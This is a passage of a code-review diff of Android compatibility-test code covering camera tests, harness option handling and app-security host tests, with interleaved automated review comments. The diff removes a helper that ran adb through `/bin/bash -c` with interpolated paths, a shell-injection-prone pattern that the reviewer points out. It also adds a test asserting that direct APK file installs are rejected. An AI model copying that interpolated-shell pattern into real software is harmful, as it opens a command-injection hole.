             assert (failed_image_number_for_crop_test == 0)
 
 
-def measure_aspect_ratio(img, raw_avlb, img_name, debug):
+def measure_aspect_ratio(img, raw_avlb, img_name):
     """ Measure the aspect ratio of the black circle in the test image.
 
     Args:
@@ -245,7 +242,6 @@
         raw_avlb: True: raw capture is available; False: raw capture is not
              available.
         img_name: string with image info of format and size.
-        debug: boolean for whether in debug mode.
     Returns:
         aspect_ratio: aspect ratio number in float.
         cc_ct: circle center position relative to the center of image.
@@ -375,8 +371,7 @@
     cv2.putText(img, "image center", (text_imgct_x, text_imgct_y),
                 cv2.FONT_HERSHEY_SIMPLEX, line_width/2.0, (255, 0, 0),
                 line_width)
-    if debug:
-        its.image.write_image(img/255, img_name, True)
+    its.image.write_image(img/255, img_name, True)
 
     print "Aspect ratio: %.3f" % aspect_ratio
     print "Circle center position regarding to image center: %.3fx%.3f" % \
diff --git a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
index a26889b..065f854 100644
--- a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
+++ b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
@@ -52,16 +52,16 @@
 
     with its.device.ItsSession() as cam:
         props = cam.get_camera_properties()
-        its.caps.skip_unless(its.caps.read_3a(props))
-        # Converge 3A and get the estimates.
-        sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
-                                                   do_af=False,
-                                                   lock_ae=True,
-                                                   lock_awb=True)
-        print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
-        print "AWB gains", gains
-        print "AWB transform", xform
-        print "AF distance", focus
+        if its.caps.read_3a(props):
+            # Converge 3A and get the estimates.
+            sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
+                                                       do_af=False,
+                                                       lock_ae=True,
+                                                       lock_awb=True)
+            print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
+            print "AWB gains", gains
+            print "AWB transform", xform
+            print "AF distance", focus
         req = its.objects.auto_capture_request()
         img_size = its.objects.get_available_output_sizes("yuv", props)
         w = img_size[0][0]
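Review bot: With `skip_unless` replaced by `if its.caps.read_3a(props):`, the names `sens`, `exp`, `gains`, `xform` and `focus` are bound only inside the branch, and on a device where `read_3a` is false the capture below runs without the 3A convergence step. The rest of the test body is outside this hunk, so I cannot tell whether any of those names is read later; if one is, it would raise a NameError on exactly the devices this change is meant to admit. A short comment above the branch would record the intent, e.g. `# 3A results are only logged; the test still runs on devices without read_3a.` (assuming that is indeed the intent).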
diff --git a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
index 288d6e4..bbd1417 100644
--- a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
+++ b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
@@ -23,7 +23,7 @@
 import matplotlib
 import matplotlib.pyplot
 import json
-import Image
+from PIL import Image
 import numpy
 import cv2
 import bisect
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index 50fd538..475a95b 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
 <manifest xmlns:android="http://schemas.android.com/apk/res/android"
       package="com.android.cts.verifier"
       android:versionCode="5"
-      android:versionName="7.0_r8">
+      android:versionName="7.0_r0">
 
     <uses-sdk android:minSdkVersion="19" android:targetSdkVersion="24"/>
 
diff --git a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
index 385f22f..d2380af 100644
--- a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
+++ b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
@@ -18,7 +18,6 @@
 
 import android.app.KeyguardManager;
 import android.content.Context;
-import android.os.Build;
 
 /**
  * ScreenLockHelper is used to check whether the device is protected by a locked screen.
@@ -30,9 +29,6 @@
      * is no way to programmatically distinguish between the two.
      */
     public static boolean isDeviceSecure(Context context) {
-        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.M) {
-            return true; // KeyguardManager.isDeviceSecure() added in M, skip this check
-        }
         KeyguardManager km = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);
         return km.isDeviceSecure();
     }
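Review bot: With the `Build.VERSION.SDK_INT` guard removed, `isDeviceSecure` calls `KeyguardManager.isDeviceSecure()` unconditionally, and the deleted comment states that method was only added in M. If this precondition helper can still run on a pre-M device, the call would fail at runtime instead of the check being skipped. If the branch only targets later releases, the Javadoc should say so, e.g. `Requires API level 23 or later.`. The Javadoc itself starts outside the hunk.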
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
index a1c8a4a..ccb9faf 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
@@ -17,6 +17,7 @@
 package com.android.compatibility.common.tradefed.targetprep;
 
 import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
+import com.android.compatibility.common.tradefed.util.CollectorUtil;
 import com.android.tradefed.build.IBuildInfo;
 import com.android.tradefed.config.Option;
 import com.android.tradefed.device.DeviceNotAvailableException;
@@ -27,18 +28,8 @@
 import com.android.tradefed.targetprep.TargetSetupError;
 import com.android.tradefed.util.FileUtil;
 
-import java.io.BufferedReader;
-import java.io.BufferedWriter;
 import java.io.File;
 import java.io.FileNotFoundException;
-import java.io.FileReader;
-import java.io.FileWriter;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
 
 /**
  * An {@link ITargetCleaner} that prepares and pulls report logs.
@@ -59,12 +50,12 @@
 
     @Override
     public void setUp(ITestDevice device, IBuildInfo buildInfo) throws TargetSetupError,
-            BuildError, DeviceNotAvailableException {
+        BuildError, DeviceNotAvailableException {
         prepareReportLogContainers(device, buildInfo);
     }
 
     private void addBuildInfo(ITestDevice device, IBuildInfo buildInfo, String key, String value)
-            throws DeviceNotAvailableException {
+        throws DeviceNotAvailableException {
     }
 
     private void prepareReportLogContainers(ITestDevice device, IBuildInfo buildInfo) {
@@ -103,93 +94,12 @@
                 CLog.e("%s is not a directory", hostReportDir.getAbsolutePath());
                 return;
             }
-            pull(device, mSrcDir, hostReportDir, resultDir);
-            reformatRepeatedStreams(resultDir);
+            String resultPath = resultDir.getAbsolutePath();
+            CollectorUtil.pullFromDevice(device, mSrcDir, resultPath);
+            CollectorUtil.pullFromHost(hostReportDir, resultDir);
+            CollectorUtil.reformatRepeatedStreams(resultDir);
         } catch (Exception exception) {
             exception.printStackTrace();
         }
     }
-
-    private void pull(ITestDevice device, String deviceSrc, File hostDir, File destDir) {
-        String hostSrc = hostDir.getAbsolutePath();
-        String dest = destDir.getAbsolutePath();
-        String deviceSideCommand = String.format("adb -s %s pull %s %s", device.getSerialNumber(),
-                deviceSrc, dest);
-        try {
-            if (device.doesFileExist(deviceSrc)) {
-                Process deviceProcess = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
-                        deviceSideCommand});
-                if (deviceProcess.waitFor() != 0) {
-                    CLog.e("Failed to run %s", deviceSideCommand);
-                }
-            }
-            FileUtil.recursiveCopy(hostDir, destDir);
-            FileUtil.recursiveDelete(hostDir);
-        } catch (Exception e) {
-            CLog.e("Caught exception during pull.");
-            CLog.e(e);
-        }
-    }
-
-    private void reformatRepeatedStreams(File resultDir) throws IOException, FileNotFoundException {
-        File[] reportLogs = resultDir.listFiles();
-        // Sometimes report logs are in a sub-directory.
-        if (reportLogs.length == 1 && reportLogs[0].isDirectory()) {
-            reportLogs = reportLogs[0].listFiles();
-        }
-        for (File reportLog : reportLogs) {
-            try (BufferedReader metricsReader = new BufferedReader(new FileReader(reportLog))) {
-                // Get metrics as string.
-                StringBuilder metricBuilder = new StringBuilder();
-                String line;
-                while ((line = metricsReader.readLine()) != null) {
-                    metricBuilder.append(line);
-                }
-                String metrics = metricBuilder.toString();
-                // Create map of stream names and metrics.
-                HashMap<String, List<String>> metricsMap = new HashMap<>();
-                String pattern = "\\\"([a-z0-9_]*)\\\":(\\{[^{}]*\\})";
-                Pattern p = Pattern.compile(pattern);
-                Matcher m = p.matcher(metrics);
-                while (m.find()) {
-                    String key = m.group(1);
-                    String value = m.group(2);
-                    if (!metricsMap.containsKey(key)) {
-                        metricsMap.put(key, new ArrayList<String>());
-                    }
-                    metricsMap.get(key).add(value);
-                }
-                // Rewrite metrics as arrays.
-                StringBuilder newMetricsBuilder = new StringBuilder();
-                newMetricsBuilder.append("{");
-                boolean firstLine = true;
-                for (String key: metricsMap.keySet()) {
-                    if (!firstLine) {
-                        newMetricsBuilder.append(",");
-                    } else {
-                        firstLine = false;
-                    }
-                    newMetricsBuilder.append("\"").append(key).append("\":[");
-                    boolean firstValue = true;
-                    for (String stream : metricsMap.get(key)) {
-                        if (!firstValue) {
-                            newMetricsBuilder.append(",");
-                        }
-                        else {
-                            firstValue = false;
-                        }
-                        newMetricsBuilder.append(stream);
-                    }
-                    newMetricsBuilder.append("]");
-                }
-                newMetricsBuilder.append("}");
-                reportLog.createNewFile();
-                try (BufferedWriter metricsWriter = new BufferedWriter(new
-                        FileWriter(reportLog))) {
-                    String newMetrics = newMetricsBuilder.toString();
-                    metricsWriter.write(newMetrics, 0, newMetrics.length());
-                }
-            }
-        }
-    }
 }
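Review bot: `mSrcDir` and the result path are now handed to `CollectorUtil.pullFromDevice`, and nothing in this hunk shows how that helper performs the pull. The removed `pull()` interpolated the serial number and both paths into a string run through `/bin/bash -c`, so any shell metacharacter in a path was interpreted by the shell. `CollectorUtil` is not among the visible lines, so it is worth confirming that it passes each value as its own argv element (or uses the device pull API) rather than carrying the shell string over. Separately, the enclosing `catch (Exception exception)` still calls `exception.printStackTrace()`, where `CLog.e(exception);` would match the `CLog.e` call just above and keep the failure in the harness log.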
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
index 248b586..025c13f 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
@@ -99,6 +99,7 @@
     private static final String SHARD_OPTION = "shards";
     public static final String SKIP_DEVICE_INFO_OPTION = "skip-device-info";
     public static final String SKIP_PRECONDITIONS_OPTION = "skip-preconditions";
+    public static final String PRIMARY_ABI_RUN = "primary-abi-only";
     public static final String DEVICE_TOKEN_OPTION = "device-token";
     public static final String LOGCAT_ON_FAILURE_SIZE_OPTION = "logcat-on-failure-size";
     private static final String URL = "dynamic-config-url";
@@ -198,6 +199,11 @@
             description = "Whether preconditions should be skipped")
     private boolean mSkipPreconditions = false;
 
+    @Option(name = PRIMARY_ABI_RUN,
+            description = "Whether to run tests with only the device primary abi. "
+                    + "This override the --abi option.")
+    private boolean mPrimaryAbiRun = false;
+
     @Option(name = DEVICE_TOKEN_OPTION,
             description = "Holds the devices' tokens, used when scheduling tests that have"
                     + "prerequisites such as requiring a SIM card. Format is <serial>:<token>",
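Review bot: The description of `PRIMARY_ABI_RUN` says "This override the --abi option.", but the `getAbis()` hunk further down does the opposite. When `mAbiName` is already set, it keeps that value and logs that `--abi` supersedes `--primary-abi-only`. The help text should match the implemented precedence, e.g. `"Ignored when the --abi option is also given."`.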
@@ -423,7 +429,9 @@
                 }
 
                 // execute pre module execution checker
-                runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+                if (checkers != null && !checkers.isEmpty()) {
+                    runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+                }
                 try {
                     module.run(listener);
                 } catch (DeviceUnresponsiveException due) {
@@ -453,7 +461,9 @@
                             TimeUtil.formatElapsedTime(expected),
                             TimeUtil.formatElapsedTime(duration));
                 }
-                runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+                if (checkers != null && !checkers.isEmpty()) {
+                    runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+                }
             }
         } catch (FileNotFoundException fnfe) {
             throw new RuntimeException("Failed to initialize modules", fnfe);
@@ -469,6 +479,15 @@
     Set<IAbi> getAbis() throws DeviceNotAvailableException {
         Set<IAbi> abis = new HashSet<>();
         Set<String> archAbis = AbiUtils.getAbisForArch(SuiteInfo.TARGET_ARCH);
+        if (mPrimaryAbiRun) {
+            if (mAbiName == null) {
+                // Get the primary from the device and make it the --abi to run.
+                mAbiName = mDevice.getProperty("ro.product.cpu.abi").trim();
+            } else {
+                CLog.d("Option --%s supersedes the option --%s, using abi: %s", ABI_OPTION,
+                        PRIMARY_ABI_RUN, mAbiName);
+            }
+        }
         for (String abi : AbiFormatter.getSupportedAbis(mDevice, "")) {
             // Only test against ABIs supported by Compatibility, and if the
             // --abi option was given, it must match.
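Review bot: `mDevice.getProperty("ro.product.cpu.abi").trim()` dereferences the property value without checking it, and `getProperty` can return null when the property is unset or cannot be read. That would surface as a NullPointerException rather than the `IllegalArgumentException("Could not get device's ABIs")` the method uses below. I would read it into a local first: `String primary = mDevice.getProperty("ro.product.cpu.abi");` then `if (primary == null) throw new IllegalArgumentException("Could not get device's primary ABI");` and `mAbiName = primary.trim();`. Note also that this getter now overwrites the `mAbiName` option field as a side effect. The body of `getAbis()` continues outside the hunk.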
@@ -477,7 +496,7 @@
                 abis.add(new Abi(abi, AbiUtils.getBitness(abi)));
             }
         }
-        if (abis == null || abis.isEmpty()) {
+        if (abis.isEmpty()) {
             if (mAbiName == null) {
                 throw new IllegalArgumentException("Could not get device's ABIs");
             } else {
diff --git a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
index 530bd09..dba3128 100644
--- a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
+++ b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
@@ -36,7 +36,6 @@
  */
 public class MetadataReporterTest extends TestCase {
 
-    private static final String ROOT_PROPERTY = "TESTS_ROOT";
     private static final String MIN_TEST_DURATION = "10";
     private static final String BUILD_NUMBER = "2";
     private static final String SUITE_PLAN = "cts";
@@ -73,7 +72,7 @@
         mBase.mkdirs();
         mTests = new File(mBase, TESTCASES);
         mTests.mkdirs();
-        System.setProperty(ROOT_PROPERTY, mRoot.getAbsolutePath());
+        System.setProperty(CompatibilityBuildHelper.ROOT_DIR, mRoot.getAbsolutePath());
         mBuildInfo = new BuildInfo(BUILD_NUMBER, "", "");
         mBuildHelper = new CompatibilityBuildHelper(mBuildInfo);
         mBuildHelper.init(SUITE_PLAN, DYNAMIC_CONFIG_URL, START_TIME);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
index 00acdf5..e500b00 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
@@ -25,9 +25,17 @@
 import com.android.tradefed.testtype.IAbi;
 import com.android.tradefed.testtype.IAbiReceiver;
 import com.android.tradefed.testtype.IBuildReceiver;
+import com.android.tradefed.util.RunUtil;
 
+import java.io.BufferedReader;
+import java.io.EOFException;
 import java.io.File;
 import java.io.FileNotFoundException;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.util.ArrayList;
+import java.util.List;
 
 /**
  * Set of tests that verify various security checks involving multiple apps are
@@ -289,6 +297,26 @@
         }
     }
 
+    /**
+     * Tests that an arbitrary file cannot be installed using the 'cmd' command.
+     */
+    public void testAdbInstallFile() throws Exception {
+        final List<String> output = AdbOutputReader.getOutput(5000L, new String[] {
+                "adb",
+                "-s",
+                getDevice().getSerialNumber(),
+                "shell",
+                "cmd",
+                "package",
+                "install",
+                "-S",
+                "1024",
+                "/data/local/tmp/foo.apk",
+        });
+        assertEquals("Line count", 1, output.size());
+        assertEquals("Error text", "Error: APK content must be streamed", output.get(0));
+    }
+
     private void runDeviceTests(String packageName) throws DeviceNotAvailableException {
         Utils.runDeviceTests(getDevice(), packageName);
     }
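Review bot: The Javadoc on `testAdbInstallFile` does not say why the call is expected to be rejected, and the literals `5000L`, `"1024"` and `/data/local/tmp/foo.apk` are unexplained. From the visible lines, the command passes an on-device path together with `-S 1024`, nothing is written to the process's stdin, and exactly one output line is expected. A comment such as `// A path combined with -S must be rejected: APK bytes may only arrive streamed on stdin.` would record the property under test; that wording is inferred from the asserted error text and should be confirmed. Comparing the full error string also ties the test to the message wording.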
@@ -297,4 +325,66 @@
             throws DeviceNotAvailableException {
         Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
     }
+
+    /** Helper class to collect the output from a command. */
+    private static class AdbOutputReader {
+        public static List<String> getOutput(long timeout, String... command) throws Exception {
+            final Process adbProcess = RunUtil.getDefault().runCmdInBackground(command);
+            final InputStream in = adbProcess.getInputStream();
+            final List<String> lines = new ArrayList<>();
+            final Object threadLock = new Object();
+            final Thread t = new Thread(new Runnable() {
+                @Override
+                public void run() {
+                    synchronized (threadLock) {
+                        readLines(in, lines);
+                        threadLock.notify();
+                    }
+                }
+            });
+            final long end = System.currentTimeMillis() + timeout;
+            synchronized (threadLock) {
+                t.start();
+                long now = System.currentTimeMillis();
+                while (now < end) {
+                    try {
+                        threadLock.wait(end - now);
+                    } catch (InterruptedException e) {
+                        now = System.currentTimeMillis();
+                        continue;
+                    }
+                    break;
+                }
+            }
+            adbProcess.destroy();
+            t.join();
+            return lines;
+        }
+
+        private static void readLines(InputStream in, List<String> lines) {
+            BufferedReader br = null;
+            try {
+                br = new BufferedReader(new InputStreamReader(in));
+                String line;
+                while ((line = readLineIgnoreException(br)) != null) {
+                    lines.add(line);
+                }
+            } catch (IOException ignore) {
+            } finally {
+                if (br != null) {
+                    try {
+                        br.close();
+                    } catch (IOException ignore) { }
+                }
+            }
+        }
+
+        private static String readLineIgnoreException(BufferedReader reader) throws IOException {
+            try {
+                return reader.readLine();
+            } catch (EOFException ignore) {
+                return null;
+            }
+        }
+    }
 }
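Review bot: The timeout in `AdbOutputReader.getOutput` cannot take effect, because the reader thread holds `threadLock` for the whole of `readLines(in, lines)`. `threadLock.wait(end - now)` must re-acquire that monitor before it returns, so if the command never closes its output the caller stays blocked and `adbProcess.destroy()` is never reached. A bounded `t.join(timeout)` with no shared lock gives the intended behaviour, though it lets an interrupt propagate instead of retrying the wait. `readLines` also swallows every `IOException`, so a read failure cannot be told apart from empty output.

```java
            // … unchanged: process start, `in` and `lines` setup …
            final Thread t = new Thread(new Runnable() {
                @Override
                public void run() {
                    readLines(in, lines);
                }
            });
            t.start();
            // Wait at most `timeout` ms for the reader; no monitor is shared with it.
            t.join(timeout);
            // Ending the process should close its output and let a blocked reader finish.
            adbProcess.destroy();
            t.join();
            return lines;
```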
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
index a4686aa..99a7e8f 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
@@ -111,9 +111,6 @@
 
     /**
      * If device doesn't have native FBE, verify normal lifecycle.
-     * Note: This test will have a false-negative on the emulator because of the
-     * tradefed and ddmlib incorrectly special-case handling the emulator which
-     * is fixed in http://r.android.com/315302
      */
     public void testDirectBootNone() throws Exception {
         if (!isSupportedDevice()) {
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
index c49340e..52dc79b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
@@ -224,6 +224,10 @@
             // Verify they can't poke at each other
             runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", owner);
             runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", secondary);
+
+            // Verify they can't access other users' content using media provider
+            runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", owner);
+            runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", secondary);
         } finally {
             getDevice().uninstallPackage(MULTIUSER_PKG);
             removeUsersForTest(users);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
index 072a533..050845b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
@@ -29,12 +29,18 @@
  * dynamic granting and behavior of legacy apps.
  */
 public class PermissionsHostTest extends DeviceTestCase implements IAbiReceiver, IBuildReceiver {
-    private static final String PKG = "com.android.cts.usepermission";
+    private static final String USES_PERMISSION_PKG = "com.android.cts.usepermission";
+    private static final String ESCALATE_PERMISSION_PKG = "com.android.cts.escalate.permission";
 
     private static final String APK_22 = "CtsUsePermissionApp22.apk";
     private static final String APK_23 = "CtsUsePermissionApp23.apk";
     private static final String APK_24 = "CtsUsePermissionApp24.apk";
 
+    private static final String APK_DECLARE_NON_RUNTIME_PERMISSIONS =
+            "CtsDeclareNonRuntimePermissions.apk";
+    private static final String APK_ESCLATE_TO_RUNTIME_PERMISSIONS =
+            "CtsEscalateToRuntimePermissions.apk";
+
     private IAbi mAbi;
     private IBuildInfo mCtsBuild;
 
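Review bot: The new constant `APK_ESCLATE_TO_RUNTIME_PERMISSIONS` is misspelled (ESCLATE for ESCALATE), while `ESCALATE_PERMISSION_PKG` above it and the APK file name it holds are spelled correctly. Renaming it to `APK_ESCALATE_TO_RUNTIME_PERMISSIONS` now is cheaper than after more tests reference it. Its uses are outside this hunk and would need the same rename.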
@@ -55,14 +61,16 @@
         assertNotNull(mAbi);
         assertNotNull(mCtsBuild);
 
-        getDevice().uninstallPackage(PKG);
+        getDevice().uninstallPackage(USES_PERMISSION_PKG);
+        getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
     }
 
     @Override
     protected void tearDown() throws Exception {
         super.tearDown();
 
-        getDevice().uninstallPackage(PKG);
+        getDevice().uninstallPackage(USES_PERMISSION_PKG);
+        getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
     }
 
     public void testFail() throws Exception {
@@ -70,7 +78,7 @@
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
         try {
-            runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+            runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                     "testFail");
             fail("Expected remote failure");
         } catch (AssertionError expected) {
@@ -82,7 +90,7 @@
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
         try {
-            runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+            runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                     "testKill");
             fail("Expected remote failure");
         } catch (AssertionError expected) {
@@ -93,7 +101,7 @@
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_22),
                 false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
                 "testCompatDefault");
     }
 
@@ -102,12 +110,12 @@
                 MigrationHelper.getTestFile(mCtsBuild, APK_22),
                 false, false));
         try {
-            runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+            runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
                     "testCompatRevoked_part1");
             fail("App must be killed on a permission revoke");
         } catch (AssertionError expected) {
         }
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
                 "testCompatRevoked_part2");
     }
 
@@ -115,63 +123,63 @@
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_22),
                 false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
                 "testNoRuntimePrompt");
     }
 
     public void testDefault23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testDefault");
     }
 
     public void testGranted23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testGranted");
     }
 
     public void testInteractiveGrant23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testInteractiveGrant");
     }
 
     public void testRuntimeGroupGrantSpecificity23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRuntimeGroupGrantSpecificity");
     }
 
     public void testRuntimeGroupGrantExpansion23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRuntimeGroupGrantExpansion");
     }
 
     public void testCancelledPermissionRequest23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testCancelledPermissionRequest");
     }
 
     public void testRequestGrantedPermission23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRequestGrantedPermission");
     }
 
     public void testDenialWithPrejudice23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testDenialWithPrejudice");
     }
 
@@ -179,11 +187,11 @@
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
         try {
-            runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+            runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                     "testRevokeAffectsWholeGroup_part1");
         } catch (AssertionError expected) {
         }
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRevokeAffectsWholeGroup_part2");
     }
 
@@ -191,51 +199,51 @@
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
         try {
-            runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+            runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                     "testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part1");
             fail("App must be killed on a permission revoke");
         } catch (Throwable expected) {
         }
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part2");
     }
 
     public void testRequestNonRuntimePermission23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
